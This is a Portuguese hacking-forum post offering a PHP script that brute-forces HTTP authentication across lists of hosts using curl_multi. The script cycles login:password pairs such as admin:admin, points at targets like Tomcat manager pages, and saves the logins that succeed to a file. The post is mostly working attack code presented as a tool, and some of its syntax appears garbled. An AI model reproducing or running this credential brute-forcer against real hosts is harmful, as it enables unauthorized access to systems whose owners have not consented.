Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[PHP] Http Auth brute com curl_multi

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    Tools [PHP] Http Auth brute com curl_multi

    Olá à todos!
    Aqui um simples script para brute em http auth's.
    Com um simples parse da resposta http obtida podemos obter o redirecionamento de login:senha corretos (:

    Uso:
    php auth_brute.php host_list user_list thread
    Code:
    Código PHP:
    <?php

    /*
     * Simple http brute by n4sss.
     * To brute simple auth's :3
     *
     * Tomcat example:
     * http://localhost:8080/manager/html
     *
     * etc.
     *
     *
     * */


    function save_buf($content$file){
            $fp fopen($file"a");
                  fwrite($fp$content."\n");
                  fclose($fp);
    }

    function     http_brute($list$users$thread){
        foreach(    $users as $common){
                $multi curl_multi_init();
                $th array_chunk($list$thread);
            foreach(    $th as $request){
                for(    $i=0;$i<=count($request)-1;$i++){
                    if(!empty(    $request[$i]) && !empty($common))
                    {
                    print     "- Bruting -> {$request[$i]} -> {$common}\n";
                        $curl[$i] = curl_init();
                        curl_setopt($curl[$i], CURLOPT_URL"$request[$i]");
                        curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER1);
                        curl_setopt($curl[$i], CURLOPT_USERPWD"$common");
                        curl_setopt($curl[$i], CURLOPT_HTTPAUTHCURLAUTH_ANY);
                        curl_setopt($curl[$i], CURLOPT_SSL_VERIFYPEERfalse);
                        curl_setopt($curl[$i], CURLOPT_FOLLOWLOCATIONtrue);
                        curl_multi_add_handle($multi$curl[$i]);
                    }
                }
            }
            do{
                    curl_multi_exec($multi$handle);
                    usleep(1);
            }while(    $handle>0);
            foreach(    $curl as $curl_id => $content){
                    $info curl_getinfo($content);
                    curl_multi_remove_handle($multi$content);
                if(    $info['http_code'] == 200){
                    print     "[+] $common -> $request[$curl_id]\n";
                        save_buf("$request[$curl_id] -> $common""Bruteds_auth.txt");
                    print     "Writed to -> Bruteds_auth.txt\n";
                }
        }
    }
    }

    if(@!    $argv[1] || @!$argv[2]){
        print     "-= Http auth brute by n4sss =-\n";
        print     "To use:\n";
        print     "php $argv[0] host_list user_list thread\n";
        print     "----------------------------------------\n";
        print     "User type: admin:admin\n";
        print     "           admin:123456\n";
        print     "           admin:4dm1n\n";
        print     "Example:\n";
        print     "php $argv[0] 200_210 user_list 10\n";
        }else{
            $list array_filter(explode("\n"file_get_contents("$argv[1]")));
            $users explode("\n"file_get_contents("$argv[2]"));
            $thread trim("$argv[3]");
        print     "-= Http auth brute by n4sss =-\n";
        print     "When we brute hosts, results can be founds at -> Bruteds_auth.txt\n";
        print     "[+] Good luck\n";
            sleep(4);
            http_brute($list$users$thread);
    }


    ?>
    []'s
    n4sss@m4g1cl4b~#$I
    just this.
    Tags: Nenhum(a)
    • Top
Anterior template Avançar
X
Working...
X